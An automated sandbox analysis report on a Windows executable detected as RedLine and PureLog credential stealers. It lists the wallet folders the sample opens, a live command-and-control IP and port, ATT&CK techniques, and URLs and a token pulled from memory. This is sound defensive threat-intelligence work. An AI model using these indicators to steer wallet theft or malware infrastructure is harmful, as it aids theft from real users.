Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.50e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.25ad31c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
lWnSA7IyVc.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
lWnSA7IyVc.exe	100%	Avira	HEUR/AGEN.1307356
lWnSA7IyVc.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.222.58.229:	0%	Avira URL Cloud	safe
185.222.58.229:55615	0%	Avira URL Cloud	safe
http://185.222.58.229:55615t-	0%	Avira URL Cloud	safe
http://185.222.58.229:55615/	0%	Avira URL Cloud	safe
http://185.222.58.229:55615	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
185.222.58.229:55615	true	Avira URL Cloud: safe	unknown
http://185.222.58.229:55615/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://www.fontbureau.com/designersG	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://www.fontbureau.com/designers/?	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac	lWnSA7IyVc.exe	false		high
http://tempuri.org/	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://www.fontbureau.com/designers	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://www.galapagosdesign.com/DPlease	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.58.229:55615t-	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.58.229:	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/ip%appdata%	lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003413000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ip.sb	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://tempuri.org/Endpoint/SetEnviron	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.58.229:55615	lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.58.229	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1567345
Start date and time:	2024-12-03 13:26:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lWnSA7IyVc.exe renamed because original name is a hash value
Original Sample Name:	3726ee297e39481c17efbe020ef5cfcc.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/45@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 67 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: lWnSA7IyVc.exe

Simulations

Behavior and APIs

Time	Type	Description
07:26:56	API Interceptor	68x Sleep call for process: lWnSA7IyVc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.222.58.229	Qtn_Jan_2023.xls	Get hash	malicious	GuLoader	Browse	185.222.58.229/R2390/csrss00.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	8ZVd2S51fr.exe	Get hash	malicious	RedLine	Browse	185.222.58.241
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	9dOKGgFNL2.exe	Get hash	malicious	RedLine	Browse	45.137.22.126
	RFQ List and airflight 2024.pif.exe	Get hash	malicious	PureLog Stealer	Browse	45.137.22.174
	Calyciform.exe	Get hash	malicious	GuLoader	Browse	45.137.22.248
	I5pvP0CU6M.exe	Get hash	malicious	RedLine	Browse	45.137.22.248
	gLsenXDHxP.exe	Get hash	malicious	RedLine	Browse	185.222.58.240
	DEVIS + FACTURE.exe	Get hash	malicious	Remcos, GuLoader	Browse	45.137.22.126
	PZNfhfaj9O.exe	Get hash	malicious	RedLine	Browse	185.222.58.80

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\tmp42CB.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp42DB.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp42EC.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp42ED.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
